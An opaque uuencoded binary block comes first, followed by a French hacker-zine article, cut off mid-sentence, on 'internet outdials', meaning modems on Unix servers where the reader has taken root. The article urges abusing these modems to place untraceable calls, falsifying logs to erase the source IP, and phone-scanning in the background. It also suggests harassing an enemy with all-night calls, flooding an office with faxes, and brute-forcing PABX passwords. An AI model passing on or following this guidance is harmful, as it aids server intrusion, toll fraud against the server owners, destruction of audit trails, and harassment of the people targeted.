M%K6L\PF7A8$&FYYTY)Z).KL8#1MUKK80,(R=>)W#C]%+;(5ZC,E.,?C:RC#I
M^,BJC9DP)9;&*EW/>!J=;*N*9;LV\'HG2JZ\J+*R(Y:2HRO?M39,!\.H1S):
M"YWKJIS3VOE)U580QS2:*ETCTU@J'=1#Z^#D9!SMT'D8`&E0A:"#K+TY5UA6
M:*MR$-QH'$DW6)&F29(V4T)#3G.8[(-P3>?>34'K*EVK^"AYKG.$A!D2)WOS
MHYTD[W/D:+R3DN0C5,BZ6J)U4F@Y<I+ZI$?@-_60?LQEC[6'5]Y/M,*@?,9^
MJW2-*=XX-0T:'D<VA3IN]H*[::KCJM$&5R1:I!-3&)D43;KP01UI'VD:M=6^
M]HA!&"
%9E6XQ-NZ!*K1S.4Y%W+55$3.$6JT]FV@RZ6F462DANW\DYI4:!5GX
MJ`1C50=F"F-FJNII2CS#0)NL!`_&H&'=AX$#AJFV,I:%*9@ZMX/YC.C?=NXT
M=RS6'G'42F13Y389EAT<AGH@+$K79952AF$$PD=HP2=%?BY]9KK*RB9(L:!@
MLY+,(0G"
+NB"<6M(!P'>)1/YH)*P_-8#!I9&PZNO*6TR@*S.8>.H'`SED+2,
M??NV\\1,MCHV!`]<`*MK;V"
44E/5OS8`$N<:EJ@4)?ZH.P?OS]:RNBH.(XG9
MUNL*\`O'CLVN;&0`/T78QQP7JLX7/0/X4,3`5#RPR3?TL5I:$0B/&8S*VVI]
M0D<%!!B;GD8$L&:[2>:DL>8J46,G%63M,5D38`Y5ADP%\!G?/"K`6E4F3T50
MRH8%\G-XU)1"
W0>'N0EEN@9'-,_D$Q(12DM"."AY\B)YDJX6*9B&5R;FH#G/
MY)V235I4_8<`^-"JSN<RM!%9LUV?DHS-7F.24L&-2><LBY%96I5(\,Z.HBQX
M!T<BG8?1*E;GBX)YP%B5H9^BS#[ZCE=V"
DTFW`%'!:MRB\:!\(4F$40<8=NJ
M(-`,3$SDYSP[23X_)J?3E)LVI1`B-TN4P6K$U+H2`!$WGFN*@]`2`*'N/")9
M%*ZM2L)>L&!'/>#UMN&'E-QZLAB9&(MY;%@R05/:>D\QP^0Q.$9[&JTVQ#YB
MAM-,?><1CNI&0DXQPMLR^02PRDI!.Q^#RI!0U_FD$3$HXG@/OQMI[8`/2(%P
M#+#).-"
`>G``@(R$HM@'H-K7[]!D\)K\7\3(H]1M59/3,L&NR78+0!I-&AR3
MFGSM`0CV("8]1O$8LZ#HY53P-C6<%]".5)PB0U(!/M)Q5[#@J(<$XL,5"%$9
M^$8BS0J?8:N^,;5)1Q^=JCMTH%<3;^S,N8@X3#'*3S+JOO/(QA0;G\-FK="
)
MD97(`"EF^F[UI#KW&3.\&&NNLA)<"&^JY8_X^)%7'YR*RAEOW$YE%W4B/1O`
M<9"\RB?RD#.GZ..E&^'=#7T$XKP0C4V`)7!+_#$YJT6DG8]`*U@U;[+"CD(@
M+X+&,NA2[<U'%[*,+>Z.4Q*=D7GE1I5IMQD4$(A#+",$!?63I`7$/\;6`\">
M0?9,0SAP%$9L"9YE05.J/F!47/7HG(R#2Y-E6%L\9:256``)W(I\$XZN0T.?
M!*:&J$%1']1BG$ANT8!B>,)=EWBRL+*&NTQHED35.2(!]U*390@S,D:>!H\;
M$W.Y<U&C0"
Y)@PP`/O':`YP*S)1BEYYB=@@@C2="-PHQO:YD`D^4-K?Y0,Y=
MU3D327OPG68E$J11MM@G)NS/U=Z<`T8GBKLJ(<<`;VSZD`ID.SC:.5=`>D<Q
M2@/A--D59A83;W-$X"
N<GG0>X'2&HC,LDCE%<X_(0H"NS=K9")J?*0)HB"I-
MA/-93`81@.(5*$+<S.$-.)T6U1J2]1,(2!T7)$9A455N08\0G6D^B`C#1&-+
MX%9Y+#;:Y@9@5"
G`Q36SQ@TO#S=9"!S,698(432`>:)8$SW2^*G-I!!'P+D:
MUX@F.4,XIR9G$<GKK!-@Q#!"
,*0*T1>;)>L*#F[6<&":'+>YL06#E(UP+@C/
M)U#:9O.3-$PXLF"
L0R%+JSMC>@)JU;E3X;8;]BZS5M-(7$Q[L(I(]F\`N4F1
M)T(LT%LTG3-%@>!&'@[6*AEYAHH"](VRR`PKUS&T5:D0X5?D2R.2PH0MUCF0
MIJ:)8@+0(8%V]MP(-F>\;#S`.R1:=1\2R28?R7>--]!`1Q0SVBSU2/P"
1I$$
MS><1B+4DST>NP4"^.A=/S(Z*L,WFF%S2+>+:J%0*S>I,%KXAO$<^%)VTM$.,
M%5BD[SSP3(R"
@0ICX<UW76)("H@S2<0FB^2H6JT>P4\IQXL@90)@T;P$",ME
MG@C;W(2LEG2@I`!0428'+((8V\XE%IXT(:"T`3$KDF6`A%I#N1&HK8S1M9W#
M5Y7ABN2>P84DY7A0`,R-6"
^,7_/4O3V!+(1(W@!67<1+N@%A\IX\!E:5/)A$
MY[#(OY!75LM`'N$G1EE/1K(0&>7#<'R&L-MP+I1X-%4;%6I"2DGQ6H,:>4:L
M%_0@CU-'QIC@1I8P`8N3;.3$(B2<-U%LBP$!!2E[YV5<6$$]1#+><N+,A=?&
M2+8+#(#!CDU614O*4FP#,HT17M@0+$^.F$,JX3:.H7NM=2E(XGM^1'9!C,N`
MG`+(*:(`TX.,FXP-]C-2M4$BXX]-5C$J*3W9&[)+)*B]VL`%PA;N$@(:'93F
MM(\)Z$DY7DF,X,'-KBR6`=%5W7*&\)>T)L1UP5KR<PURPJ=-AJ`D<#)39$4R
M%2PAK@QH-1+WUY-`UM.9->AS3H;J+)/-(#JY98+>^4R\G"
>N):"_Q1V3I-*6
M<`D4"
&A?YQL-@U$39];`*E#8AJ)%WZ!&Q-@*D3<T!T("`,=/A%=H$5FO:+`2
ME]L.@:UA%,230=X`)Y13!@ZO-3UO,1PQVM/:51+@,<2F-<@0T(3VP1RXC>H[
M+Q3&D0:1L@LOB?M/$A&`>`Z?`MA^KX%H(23@BSBLY9(+BE28-A8ADD1"
*4+T
M:"`]U#P1DAGKPSA210-A`?D?12T^@J2)AE=!2M#@1!&W9%..(H/1>@1=H^^C
M\]/(NB6F@'RC93?@DY.6+<HB#02P4)0HA')L.^>(MMY0-@[GM88W;0+S@5<T
M!T?J"
5K0>H!_.40-VJT!\E$UCB$5RXFXC7,,B6]G6<`Q4"Y"!A6`^8)RKJ@G
M,&M&V8D':4Y<;?81$$"JE1AFA`BDFRDXK_'_*A&1Y:BZ)1J@%4^N:<J##Q.W
M<4BR0;ZF)C?GO6[[4,R4@BQEZ0$6JCQE_R4>3['N/""L(9#V&JC7BGFJ'2!_
MRHX1HDXZ@VE8JK,A1X.DFP8SPL38HC,:0)W$K#E/<9*:5FL,<'-LN,L2HN!(
M43_89'AN,=S$%!NWL:,&0'9FK6W6I791Q_("
^&CJ/B8_RB")<0`D0$.G9HD!
MB2ASE(V#X26$5\HI<IS42*P.B`_C[9:HQP0`2*V2C.0])\I"
$:93I.I/2A;>
MU;-"'56!N+J/-!I5$K"J?\&9CHV]P[-+)M"KV"FEYD5..N=\:AALD&]2;IQ=
M\`H1K^W#@M4KJDFE;*!;W_Q#9>F)68,@Q#)EBS@@J%`59310OXJ!>)!2'A26
MXCP:&=&M)&0#K,Z"/&>,PE#<S7!?T#"JQO)@068ZPF&M0'O*-B=DGFJBB@_8
MRNC(VK69A!>C[FQ)>X_4H.X<!$(![JK6E`$[M"0K<"V6.K.&P@764M?+@M99
MDZPX?#PK8@!"RFR9Z2Q#6I$9K00IEK2)<F#0Q9P"10D3`&J;&H@-,4FDHN2=
MT*ZB:H,J56A!_A@2*(WH/N@,&!DC#@?(`.DF2:<QY3CJAB6(]("#SF0,*("K
M:P\:?,Q050GII4+((3X'0A8*)VH5#:5L.S<)B#U2T7PY1A`-XHG(8($KH?D'
M&+V,+9<K9^\CF%!="3P8E(HL%`F_DKU:'1"/I6IY)`Q4CE1/0\`?>PS.I723
M1<=$C1@'TR(O`L^,E$TA$,@)!+1Q"=#/;'>SD%2+`ZTNJD",&9U39-`+82A*
M3G!<,<F&C,A+M6BM+'*%J'+C,UD9WRHZRH'%FN:[$0H#]21^*=%7D9TC[091
MIBP<7!B6TGD9+XMNU:')"J4TV3R'\V(ZJLGFT8]CEQ@<';&5/&XR'LE*J]QC
MMAA)]L8`B[/JF5[VX,W$TAF,#H&<Y`T7-Y$J))*#4FK6JRTFE3I3'0L6'^74
M+-@)L&GB?B!TCKFIGPB4M*^Q!>002(XR<7PG$%VHTI.084*3OF<A2'H456ZC
M5:.96*NCL!20Y5:_LHZ/L9_I`&D*&!(&C:-UA4>6_>DQP%WKJJR#%)#N-)MW
MH504J"
8#MRS^UWQI=)(B"F*3%TZUJ`Z=P9XE5;PF1#U-\2Q!3V!VK:H**ES.
M=TB#$?36D64H;R+(`E7T@%)(L0FO';I;+WH68E)VI%NXD@=SI7,<I%C)TD@(
MP@"
A+BN8N4,>0Q8'XN@Q6IT/05(;.M-##CY.6MC.WG4I]A/?8V-Q*[)V,'G7
M3B,C4L=)JTT=UHV%*E7=PO*GEG.%DEE-+<Y-B2.@]2P=<(U@2&>A&1%,4RZF
M4X:1-(]B\"=N&Z+DF,<T$N>&C0`FB0&5S(AKRBE9.6$-2?:Z'RBTIGIKJ2":
M2*>U:L1U25DO:$Z&C85>K<]3`*V@B,04LLU,>@;'FLBN=!Q!I_MYJ\3"D<`1
M<N@)SD(,$6`2D&Q0;Q!YJ7LE1&CK[4CY8BDB3.UTJ>0-Y;BO>G`VT@3>,P3D
M6%Z%7D_B4A"
V.7!61%FJD2(@C;S79V"5<FHU2REEFM"+K$^`&9'?I.23GT2S
M*]BJ`!I1'(":6<M"8[*"A;'5>AV$WKE&9,CQ1CK516"TDVKU?64C:Z>+<!_D
MY?VD22LUP:ZI>HID2(V44P2X1XYTFIFQVC'VD[]:L&I5X`F;R`W5X`79)/*H
MK#((4:\V.'"TV"3JH)<8J:9?3EY`6\F;P:R-9[%G(=9K31FMB<:*T#)!BTQ'
M$2^/(3+87L]"2OK<&$D(C)7Z.6&)G%BFV`U$RBFRCE>F%,FH.AP2(EV<R%?8
MQ$,FKE&J:SIU=@*;EF#_=>V::V0KE$%C'(4\G5#;`)"
!MLT2+7*@1+@;BN%/
MMITZ(?`+\OFLP"(AH(ZBJE1R:1^`?613=270JT;.1A6;\C0#[S5K4TZ\!,D'
M&A>ZQ5*&&]X3MI?ZOI&=EW%G/&>4UV,8EUJ6CABMH1SR35@G*&E_2@),D1OB
M,^6$C4NJ,"
%;#RE0QH9@#-;93Y2-@B?8AG``(C?JEHMY`#+)T"@@@,S-KB:P
MYI'I5F'*-K2J62%&UI/%&(;<B*E-O0C42#9.:>2(I)O..:W2+K53+@OC+G)K
MM5XEC*?3C,R0\WB*[9[!D#@AJH3UZ*1SS[D=UN3K/GP$%J16-4%<5X+\T2.)
M$,ELJS_EH+M5:V'KD2(<,%2E3%6AT8[(LX+H=5AC@'%D):5PE!I/4`AP@KB?
MPBYBR<5:9:;4$2EW0.Y6'(JR$/`3ELC&8+K(85.;0QF3]#02NV5>E2.!VB-$
MA!8ZV4"
:*2)4TJQ]8KZ$V[H2C^"EB5EP#G6V,U:KK7(E)Z`>%OR]59T3J$2I
M[E6M&8'01/E7*+4\TR-.0A8)/"
<4G>!TB5"M#`K&0WD9W`FY\<9VRZ$0L26L
M3SM%IX#@%0:4DJI;2$_`,3N'11H!"
R3N`W]DADYE@$0(2W2VH"!<I()='PR>
MFN@$RR$-&&5N^3`32*&)!\5D(NO1>7*`A="
>_;`2T:N=DA5K#<1DP!%'4),6
M#<IQ.[@X160&`S(4&4![F!Z)U<L":-&T52'O-5.*A(,21N(HAFLDX#'24R1!
M!/AIY[O>E]R#XCF4&4!F*)8@.X!(VCD>E!]M?Y(GP_05:0WT-@`DB+V#RC)'
M=1T;)F&1$F^K6%;H]B0/N&PD?H6L&0A)SP>`;B8_YEXCC%II354EAJNN/3,%
M5X[(FRC312[&<NAUEJ19RG16Y+F!'`@-(#[=\V133L*E[)B8HPZ6<%"
#&*A$
M6I-@.-@\H1)"4AA[C(J@$E*TBK$HU7FJH2(O`K<COP&S!-=/;#<+`2>;0&Z(
M?\%.LJ9GQL"
FA;5T7;N@1>S,00?/C"6VH!"EI*4L/)8'URR=4TQ3.27J3U%$
M;&U,E-?Z`HV2,GJ81D3Z3/F<92PHZ[LG@D[Y=DK$'>]/>@$TDN>$9I7.IGX>
M6YX_<NT4%7,KTU`DH)DU]"2*T6J"A?6ZAF2%'=$^0/[!2B+%`2L1(ZB"@!BM
M(.?&LB:)3=%3:N"
L#FDB<8(`GFM2.T/5H.8]J@,<7&S/;2$60A#MR1F9,G*$
M=M(&&TR=,R%J8(WM3!Q0@TA)V0W"(I/D5U,`+I>,I,4$."AO%4^?)M-.I4'+
M$>1IA=X9A=#8]S$B%Q#$C9TMK)Q04I7"DJ:H!7LM#PE,O=HB,O)XBCM6BU)0
MK/:8&8"
=GI8#>"+_TE.OW":`(.D9X0^QD/!H\LC\#%4C97F@2_>GI=($>H,@
M7%LEJ6#1A!6%S%CR$B9$>3Z']ZP0S5NU'G`4G6D:!/^1B6IG%D@A8N>7/)<G
M-9J%QW(Z1/BI'7(T95O]81R1VW1O1[[@VCD>(!5)2&,DV),+Q$Y+/2^[7GL'
MU91!C71*/$JO;7L";(P:D81D-8&)I;XJ6Q[M:Z?S`,CRO!U5O$K).='99))1
MZM3/*;A&FA5C>QH`67TD_9>'_@RGN(,6*K-^-A4DB'DB?8`6@1-05`<P6NXH
M"
W63=,QV!L2]S":2?`!94O!VBJZ171CBG0)9#A*M'M61XL6)8D))GY!=T4J0
MJ,CVQ!F<U,G@_29+1QBA)_H"
$#JVIV6`/L!#T]@P+HO.9Q0X#+=T8B+'$F$(
MVZ2=HFX9PE0J'>59.]*'LPXTCS@,+`XI)9W!@P:&1$]4@'%EG_I3>&[T)2JT
M.A.\/A)'@U(3N`[AM>(RF;%%==#&U$^P8H0VA&C/U(WE*0J*]A-DR_N)`#)F
MX`>=DABE=&A/X6(/(2:R4!Y*FN3Z^1?P%'Y'U4&OQS$2UH80!:R_]C"(6$EV
MZ48P-^-H'Q*>F3.AJ$R@TH[L"
E&U'/&VJ&Y%`F5R=+(!S!@5/=4P1I`U[)$0
M7`8#,MCF$,`<U2)Y>=`BMCPRE?A!3T5F$&4C;9,50D1BD?PCE0<<9>/,8Q$/
M>1K"D+3E9+]5ZQ5#T&E/,F"'@CP*&`$N9IK_<^TV)QN)>X9\GK(TT$;9\!S\
M9>Q/_4'WR3$U]H@KL_1DHU+#%-OW\N@2CXJLW5I$N/X,E\&,AOGVO,*$W)_.
M;KV7#FD,56:@V9*3-"MAXP@J0:=]L#VDMS1NEB*T&HACR`)<SUN`."&,I$&X
MA(W]N=;R2!5O3V>5!WH!49U?3FRTBO)L!:N.%'$B`R5)H=446#D+;_M@$@Q`
M4CTY&`"3(;\;8Z9*25V'+^6"YH/`)<`VK5?)K,N.JP9K@*-3!P'$5D"*7O$#
MSHAVB@@$S:'5K_/$<T-7)`>*0UIM#E<B@VD<SQN0%,IT!<*EHDP.2W(.B7V;
MPP3.++&L<JR!3(+F8T@+VY-!H3P&H'IM+;&2^U%]`G2[/$M-;#I,I5A/?B,L
MJ$NOLTR9EW,UJD,P\$)![#T"
.)&:D:],EF?1JPTP1&>5ZO%5`@>IXJ=]LER0
M!X.A2!%[#21+N"KY!V0RB2Q:!87YZG=5;DGF\OP0[0/1*CHZQ^$)>AY;/I2,
ML!-A"
8AILJD_>8D@@;2+SK-S%(%'JIZ/R/OP)^$\,%YLGN%"<@$'(4\%<1?6
MT)/I"
!FCU%15U`:):NSGD8B.K)RF4$R%8OH)3>+E@7NRL3$**WMV&R%H!$B*
M$QSF,,5V;J@!GH0EE@>CS>:LT(`#6WI64Y;BK")$53IA2Y2W($,7UO>Z<)B<
MT[)5E6!+K)V]>`\_S:GYOX]1Y(;4"
$_"3*SQ3T"1H(H?[,V'3/Z![,L4VM:9
M):A\"I1M&L"=).8D$?Q`PN@I":TL&$C#1!@&$E2JWV2K#+"!V(MUV7'2AV"%
M&?0SZ!$T/"
>J3R!$0)#M]PO.N3RU)Y5"QF[[;Q;*V5(0K:8ILA\=62(@1AI'
M)W^E\E,>_6[6SJ)"
*D@\T6C$)3KSDN4P28OV6P8V(J_KI[WEMQ.<_*.<#R4(
MM>K?PJXRG0)*4#;$&3.\+#\A^;E^H[K]O=T_>^3MY^V__^(<VFJ__T2`9*R^
M_T'8W[S[_=<O\/GXHV']A]F#`?_+YT^?IL6PFIV>ICCDU7+S+H&!7Y?7N1K.
MEN>KD(;R>^&SP^U/-4^6L?PT;/=5$K[\N'*]');^20KKV@.]A]EZ"&XQ^%3>
M*Q&'9[-U_>'H<6E]XZ`-<FTX7BW6P\?#\0M,_AA+^GCX;KC_]9?MA0;PH-U?
MEEY#>[>(6-*-<B<MPNK%Z;K^4GT1!\3R_N<R#Z?N[*S\4/ULKS3]YKCL976V
MQ@#S7.ZOCV=G`_[W0UJ]&.:SQ\?K^8LAQ=FZ"
^3TW,]G88C+$S=;E#%()&$9
MT_5A^&*Y&LYF)Z=H,EN_.*3ATF(]6Z4BFG,(X=EL/A]6J71O@Y51:+SK>_0+
MNYV79<R6%]^+<<G[,ZYL?UI[9?=J^U7?E??>@TSI!WU?77.KE</"Z%=]_041
MX++'`_W,[VDZ&\Y/!_6T:`MJJH((;I7R^7PX3O16A?Z+OT_O?U=>AR'K()OW
M1NP_/YP=#/OUMVVSA]\_O_[L>OE)_N]^-WMX,.QV?\#*6RZH(=LV9`\/MDWX
MM@G?-N&[3<2VB=@V$;M-Y+:)W#:1.TUP[XO::'^?EG65YCX8_D8SU"
MEG&V?
MK^]_>^_S?7?H#Q?HZ*[7]R+\[2:-Y4O/^GO'Q4-Z5<?3E$X'-YRE=;&TU;+\
M)G#Q>/AJ^&!X4*1/OZ]L;TG`WX_:NQ(N_&KPHZ^.7K_VT8-ZL;QM!+.\^'[D
M#R]<*)L].]I[64;]OBH-]_?V+@Y2UGKTZL5R]4%IN_?#<A8W7O<(3C8[A3D,
M^Q?;#\_GA\.KEU8'>W4CNZ^/^&Y^]-JEU5'URN_F),F;PT?/J=5WJ^V55QJ1
MN+^"_=26I)+O5H=H<#CP@]V+N%!NB(-+6LK+6JK+6NK+6IK+6MK+6HZ7M9PN
M:\G994WYI7OBEVZ*7[HK?NFV^*7[XFUC70%=VMP^)#5`']!*4\8179F7*ZMV
MY>7KME-^^`J[V7U-2'$.H%)]%<[&8`_I;1[/UTO$BF9"
Y<KL<'B"X/.\3E?>
M$P1'P=CI;/VZ:T2W=I=?G5]^>?6:6:[3R2EM%CX,./?G.</PW7R57'PQU#?T
MN!H?`/X%\/^MN#&:E[_W9Q`&.QIFP^\)+?'UZM6#/6(^LPQ0@DO.'E[_:OCM
MS>'>MW?O'L#IWZMW^JTNC^'FS8UL#H8//D"
S?:#%(IR<[N]75__H8-CI='`X
M;"Y7\6X[8R1V0#/1OD[<.AS_MBR\7BE*+B][:&L[VEQ]L+WZH%U=I?7Y:E'^
M>-FV];():[$<3E?IVE9"
)+H;F.UI&A;IV;!<I"8L-"_`^*%__F&A#9#Y^D47
M-;7PSS'W_K5F_V\1;GO#S"OBO;DKWCK6K*RY#$%A[.K`CW8W4/]3AWB.\=EV
M6"
P5\!^'Y3S"YAIGR>=@,+/U8>$UC5/47]#_X&;S\MOY&FKKM,V@^UQYE5)=
MI7^.91YL+K^R/]4,Y[V+'4J$/;ATJ`=TN>NB.-W,S6<_DN`O2!:WSX^O7[^^
M83]+1/U"
`9K@^^**_"]B^\'0WU#5?]0/#@<&]&-:Y@M-#V@UF\6]/M1V+'7Y
M$)CM<M6K"
SZU*YFW+%AH\_:5;CV@[KU??+!S\<&%/6W=="?D#O6U1XMP^F)_
MI]WA*_YXU+107[IV`QY57&'S8A6B!G"
*IL.AO$U@QV\@B\?GZ:R\E6U5=O>B
ML.PG2&LJXS@;SL+*G8!H@FNLC],)H/-\351NMO[P;#L.>"O@UP%A,==CK`"M
MAS-WDCJEA@=C:>?S-1'&`KT';\"Z;@X755-"1]7*YET0LX=_ATKKW2=T]PGN
M0G?X0M[06>:3G6';!0)MZO?V-5Z].MNZ=\'[3C?8T86+1$])P76"UV[R=A/+
M!9X<#.]OE'Q9:[';6OQ4:[G;6E[:ND0PM-ILX>@UR?=O?]N&QB:D.JS:';8!
MR%X;N,3U<FY-GZ-^>?7*Y9\PA^'JS;+5+NW7&.7^!W6NPZ'^NSJ@`2_L81N^
M-Y>+M/NMU<ZZ+S&L"
\J^W+0V:RP&]G<L\!4S;.O;N?KZ\K91IC"D$OW6@&1D
M7)B.<'A>4HQG[FQXMIJMUTB"
-V]E+(ONB7D)-RV+0U(1D(R>I<,2MEXLSPO_
M7SR&^R++!J#7]#:5V_AG0>_**T6-FIO7M)1"&<)V>?$>>B#_J[%K75/!,W")
M%*^7//U"%G?K[C><JI(N1F;XA3NBGE[);#R;-+V[;[E`>%D/1ET#WNY@2\_-
MRW3K]'Q=][E9(&8D,N/=63(*PKQR_6/&A53:V+'\2@FS/CZ>/7DZ/UDL3_\3
M$?C\AV?/7_Q8WO-W^XLO_W#GW_]X]T_W[G_U/[]^\,VW_^O/W_WE/ZY`=95B
MUA%C"
HTOA5VR>2ET&/4ZCZN#5`.]649XKQ&C-D+[@U5&_%HN523PJ.R_,[8J
M@,.A_8&(?1D9OA#:YBFCPZJ4+([ZXA?;+/"CTZ/=LDDEX?LT"0+4/"WJ'P>'
MFREJ\S(H=EU53-LHX[<KXN*(6_^@I7Q0V](XI^B"
35""<'KU*O[\\.J'1^_5
MTL35X22YQ=DKEM`"RP)-)<WT[+C8P?YB^&27C;7AFOAI?1_4VNL&%?NB]^G+
M)Y_T?*V.?^WF8+94Z1^<KPKHE>F:T/;KOV^=[*-3BC$O?\47CFU?@/;SS?%3
M]5\M5:W_ZO)DL;'EDK3R7?WWE_B\_36\?U\%$M=6H)>O7)L]7KAYN;9'6?N3
MPZ>'\\.3P\7A\HBP_'3N9HOON1@?'GX4CE-X>K177G([?(3QDCLY(J`\3O/3
MGL@>-?`D'KI_4+R2&M_,RU.@V!78\_73Y?K*X15WI3I>/L7:UGF?FAU>>?_L
MQOMG?UU<.:RS']9Y7VD8E^?KPRM?]7CT96'7*=X8=OJA1TM\-WB^2D_W*^HN
MZ[*&-MR5ORX>K)>EHN[6P_OQ]?^5,2](!V.GYX!GI+H8O!2&Z[AN]3CTD(#O
M/WS_D%"
IW`N')\N8;HK#'V;IV4UVN/#\II3X1]SDHB(.138"V";RV>+T?%V"
M:[E/@H^S4,,'*6__P9TO[]S[YK#NK<IHEO?+,@I3.B#%U)6PEH16R-S?#X`U
M)!#+T_4^+;HT.ARN_'#CV0UW8W'CQQO^QI6#@U+R0#Z_@=:S9[-U.-X/VRLE
M>@%HAP]_^/#&4+:&@?E168Y[>O1JFV=H4Z1`;3:;NXEE8/XW]7+;7J"
G16Y&
MEW^+X,2;.BU>ZZ1&ZJ3MF_K\^,8^;YG(7^CT:ALP'@<WN/&*)EZ^I+`/P[Y9
M+Q8E7*LU8>BO&LI-3C:*O[>"NLDNTVDQB1+.JMX_*4G-OPWD:YN>4.WJRL%P
M8RAP0:2C&W_UG9)ZOG]&ISW%H^8`FNI,Q?3K.@\W8^T:TF]SR<[+`@X.-HS]
M++@%7<2T[Y]=.1RZ0U*#2WG5/CE[=X##@6W:0P3%L@Y>]?\R^.^O?=+^LP,8
M;8@M<-11KE[=&?"
W`)M2EKO8]J#!5F]XDDZ0Z.]_L%W48:](M$L'!0&H<1=H
M7"[2]6&]>I$J?-3,ORQNF-6V&P6+BR#TZ>I\G0J/#6GXW^^??4BG6;?N/;A3
M1@'C+CBT50?,LX#'P8XNA_TK?/@,*.+"
&I%PN(MX>?TZNK1&A.4ER_GPK^S#
MB[09PQ%QQIC$G+LZJ1M[2/6X7T6#P]^MMY<7I"%^4AKB'Y+&)A>M]Y_T^T_>
M)*U=D3_YE:W_IT5W47;R#;)#FZWXY#]5?/7^TW[_:;__].\3[ZY&G_[K"
_NB
MM-5/6JKZ145=[\_[_7F_/_^OJ&+75N;_^@CRJFKT3ZI&_TNIIMX_Z?=/^OV3
M?YKJ=NSQY+^%.B_JT_RD/LU_*WW6^XM^?]'O+WX>?>^:_*^E_7],^1>U;W]2
M^_;_*^W7^\M^?]GO+W]^ZU@<[;K3\K^'K91B?R\7[%0U2KK5*XS;HL'=]">W
M^L_SV=EPN]7Z-P7R6K!+JZUIM4[G9^YQ*F6*X?ME?>3MX?#[5ZOKGY3-T(P7
M^@[#-3]L/W]=^YV,P<WG-5=X;4;T<A=Z[?R!7J?';MB_=>W'@\LZ+M[8<7%^
MDE:SX.;#/KLV7=KYQ[?/NC,"
IC]\TRC/AM_W?/23OZXWJ>GCEK1>UN6'"Q/_
MD%9^>99JZD1-2^4&RS[X=:NZ[S[O/N\^[S[O/N\^[S[O/N\^[SZ7?_X?!W;)
%/@!X``!J
`
end



____ __ **1er Anniversaire**_ _______ ________ __PyroFreak Magazine #10
|12-Internet Outdial
|(X) Phreak (X) Hack ( ) Autres
'.__________Par LeMarquis________ ________ lemarquiz@yahoo.com ______ ___



Le modem est l'éternel compagnon de tout fanatique de hack ou phreak. C'est
lui qui nous sert de passerelle a l'univers du binaire. La retraçage de la
source d'une quelconque attaque est intimement lié avec
modulateur-démodulateur. Chaque appel venant de notre modem est
scrupuleusement enregistré sur les serveurs de notre compagnie téléphonique.
Sur le net, notre antagoniste à la recherche de notre identité physique devra
d'abord identifier notre réelle adresse IP. Et ensuite remonter par notre
compagnie d'accès internet jusqu'à notre appel modem. Le fait qu'il est
possible de déguiser notre adresse IP par des passerelles nous permet de
faire notre travail sans avoir à falsifier notre appel modem. Par contre,
lorsque nous devons entrer sur des réseaux internes (dial-in) ou faire de
phone scanning, nous sommes en relation direct avec notre cible. Nous pouvons
toujours enlever le call-back, mais on peut encore retracer l'appel. Il
existe une variété de outdial qui permette de passer par une passerelle
téléphonique sur des numéros de téléphone (vmb,pabx). Je traiterais de cette
article d'un forme de outdial peu connu, les outdial d'internet.


Il y a presqu'une décennie, en pleine explosion des BBS et dans l'éclosion
d'internet. On trouvait sur le net, des serveurs unix qui grâce à leurs
modems nous permettaient de faire des appels téléphoniques dans leur zone
d'appel locale. On évitait ainsi de payer des frais d'appels interurbains. En
se connectant sur le net et en passant par un modem de la côte ouest, nous
pouvions aller sur un BBS de Vancouver avec un appel local. Sauf que depuis
ce temps les BBS ne sont plus populaire et l'abus des serveurs qui offrait
leurs modems, a fait disparaître ce service.


Priver d'un service légitime, nous sommes obliger de le faire de façon
illégitime. Car malgré les apparences, les modems connectés au réseau ne sont
pas disparus. Il nous faut les trouver où ils sont essentiel, c'est-à-dire
dans les compagnies d'accès internet et utilisant des fax par un serveur
unix. La difficulté avec ces box, c'est qu'ils sont rare et ont très souvent
une sécurité renforcée. Une fois que nous avons trouver un serveur unix avec
un modem, nous devons obligatoirement être en root pour pouvoir l'utiliser.
De plus, le serveur doit avoir un connexion de type "
eth" ou connexion par
cable. Si il n'a qu'un connexion en ppp et un seul modem, si l'on utilise le
modem, le serveur serait automatiquement déconnecté du net (et nous du
serveur). Un fois toutes ces conditions remplies, le plaisir commence.


Nous pouvons en nous connectant via telnet appeler où nous voulons dans le
monde. À l'aide de logiciel terminal comme minicom, nous nous connectons a
des modems sur le réseau téléphonique. On peut seulement se connecter a
des carriers, oublier toutes les vocales. La source de l'appel est bien sur
le serveur unix qui héberge le modem. Les appels locales se feront dans
l'area dans laquelle se trouve le modem. Nous avons aussi la liberté de faire
des longues distances. Ils ne faut pas en abuser. A la fin du mois
l'administrateur va sauter en voyant son bill de téléphone et notre
plate-forme de hacking va s'éteindre. Le serveur peut aussi être utilisé pour
faire du phone scanning. On peut dissimuler en background un programme qui
fait le travail par lui-même. Certains gros serveur offrant accès à internet
on parfois plus de 10 modems ! Imaginer quelques instant, un scan en shootgun
avec 15 modems simultanément.

Un autre merveilleux service que peut nous rendre ce modem c'est d'être
complètement anonyme sur le net. Disons que tu call par une dizaine de pabx
et de vmb outdial, même si tu es très anonyme, il reste que chaque appel
venant de ton modem et des outdials est enregistrer. Avec les internet
outdial, tu peux te connecter sur internet et après quelques passerelles, te
connecter sur le serveur de outdial. Sur ce serveur tu peux ensuite te
reconnecter sur internet ! Tu call un accès internet de type shell ou un
provider qui offre telnet ou rlogin sans passer par le ppp. Il est toujours
possible de marcher par pppd mais sa reste plus compliqué. Le gros avantage
avec cette technique est que grâce à notre root accès sur le serveur
d'outdial nous pouvons effacer toute trace de notre source IP qui utilise le
modem.

Route classique:

MODEM => PABX => PPP => PASSERELLE => CIBLE

Chaque connexions est enregistrées.


Route avec internet outdial:

MODEM => PABX => PPP => PASSERELLE =>/ SERVEUR OUTDIAL => PABX => PPP
PHONE => INTERNET => PHONE => INTERNET

Connexions entre la PASSERELLE et le SERVEUR OUDIAL peux être facilement
anonyme en falsifiant les logs.

Ils existent milles et unes utilisation farfelu que l'on pourrait faire de
ces modems. On pourrait sans trop de difficulté se faire un petit script qui
pourrait appeler à un numéro précis sans interruption.. On pourrait exécuter
se script pendant la nuit et le laisser agir en background. Le numéro est à
votre discrétion. Vous pourriez paralyser le téléphone et offrir une nuit
blanche à votre ennemi juré. Nous pourrions installer un BBS, une PABX, ou
peut-être un boite vocale sur ces modem, si nous somme assez chanceux pour
capturer des modems vocales. Une avalanche de message fax pourrait inonder un
bureau, grâce à la puissance de nos fameux modems. Avec quelque effort en
programmation, une dizaine de modems devinerais rapidement le password d'une
PABX.

Le modem est le meilleur ami de l'homme. Plus l'homme en possède plus il est
puissant. Pourquoi se restreindre a un seul ami ? Être populaire, n'est-il
